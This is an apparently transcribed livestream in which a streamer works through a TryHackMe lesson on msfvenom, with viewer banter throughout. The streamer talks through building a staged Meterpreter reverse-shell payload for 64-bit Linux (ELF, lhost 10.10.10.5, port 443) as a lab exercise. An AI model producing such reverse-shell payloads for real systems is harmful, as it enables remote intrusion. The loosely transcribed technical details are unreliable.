I'm good. Now I can do that. Okay, so we have here other stuff. So big thanks, Bandit, for it. Hey, job, I'm something way down the road for you. Yeah, yeah. I think it will be nice. I was thinking like this would be such a nice research topics and all those to do during a master's or fourth year of computer science journey. But this is my favorite one. Hey, job, it's I'm streaming. I just called Tmux, install Tmux. Yeah, that's interesting. Okay, and we are streaming, and we are going to hack now. Okay, other payloads based on the target system configuration, operating system, blah blah blah. Install web server, install metadata, etc. MSF Venom can be used to create payloads in almost all formats. Below are few examples you will often use. In all these examples, lhost will be IP address of your attacking machine, and lport will be the port on which your handler will listen. Linux executable and linkable format ELF. MSF Venom-P basically the payload. Linux x86 P is payload, right, or not protocol? MSF-P option. P is payload. Okay. P is about payload. Thanks, Bandit. Oh, this is Metasploit. We are going back to this. Okay. So when there is where it is shell underscore reverse TCP, this is stageless, and this one is staged. I have to remember this. Stageless payloads are denoted. Yeah, this is stageless and this is staged. Okay. Aside from the MSF console man page, the other thing that is important to note when working with MSF Venom is the MSF Venom list. We did that and we got the whole list. Generate a staged reverse shell for 64-bit Windows target in a exe format using TryHackMe tunnel IP address and choose okay. Okay, we did this right with the MSF Venom-P Windows x64 reverse TCP shell, and then our lport, rport, or lport host. That's how we do it, right? So that command is just here, so I'm just going to see. I'll exit. Okay, this is the one. Reverse TCP, shell reverse TCP, okay. An output file, that's what I meant, okay. No, wrong thing. Didn't copy it. Why is not getting copied? Okay, never mind. I'll just copy from the here. This is the guy. Staged. So with the slash. Which symbol is used? To show that the shell is stageless? Underscore? No. No. Okay. Yeah. I don't know what's going on. What command would you use to generate a stage metapreter reverse shell for x64 Linux target? Assuming your IP is this and you are listening on port 443, the format for the shell is ELF and the output file name should be shell. Okay. What command will you generate a stage? So first will be MSF Venom, I think. Anybody like maybe less people join. More people can join with this. Generate a stage metapreter reverse shell for a 64-bit Linux target. Linux. First is the operating system, then the architecture. So 64 is basically MSF Venom here. 64-bit Linux and then metapreter. Okay. Format is ELF, so -f ELF. File name should be shell.elf. Elf is the Lord of the Rings kind. Oh, really? Elf is Lords of the Ring. Huh. Ah, interesting. Oh, nice, nice. I had no idea about this. Damn. Oh, metapreter. And then I'm getting a reverse shell. Reverse TCP. Dash format should be ELF. Output should be shell.elf. And IP should be, oh wait, shouldn't, shell port 443. No ELF. Okay, yeah. So I just saw things. Oh yeah, L host. Thank you, bro. Thank you, Bandit. Thank you. And then 10.10.10.5. It way I think I need to practice this a lot. And I have to do port is 443, so L port 443. Yay, baby. Let's do it. I did it, I mean. Let's go. Oh, this is interesting indeed. It's a super cool tool for catching reverse shells. Okay, so let's cover this tomorrow because I have a work meeting going on right now as we speak. So apologies, lads. I could not complete task 10. But good part is Friday is here. Friday, I'm all about you guys. Friday, we'll do whatever you guys want. Like Friday, Sunday, all no can do job. I'm streaming. Man, I wish, Bandit. I wish I could do that. I have a lot of bills to pay right now. My streaming is not able to pay that many bills. I'm able to like just do stream for 8 hours a day every Monday to Friday. That will be like my ideal situation, honestly. Right? That'll be the most ideal situation for me. Hopefully soon. Hopefully, because I'm just 4 months in. I'm still happy with like how many like so many messages I get. Right? That's still big. Um. So yeah, that's all I can say. And for everyone, right? Let me know what is the poll you whatever you want for the I think poll, right? Like we had TryHackMe pen tester certificate we can look into over the wire or OneHub. I'll put the poll in Discord, and tomorrow I will have more time. Tomorrow I don't have the meeting, so tomorrow we got time. Then Friday we got time. There is no meeting on Friday, so yeah, that's all for now. Thank you so much, everybody, for joining. Hope you have a great day. Let me know what I can improve. I know this week has been crazy busy for me. I'm not that much reachable, not much there because of the work. But hopefully soon I get it there. But yeah, that's all, everybody. Thank you so much. Have a great day. And I'll see you guys tomorrow. Till then, thank you. Enjoy. Bless. And bye. Bye, everyone. Have a good one. See ya, see ya, see ya, see ya. I love you. Thank you, Bandit. Thank you so much. See you guys tomorrow. Bye, everybody. Love you all. Thank you, thank you, thank you.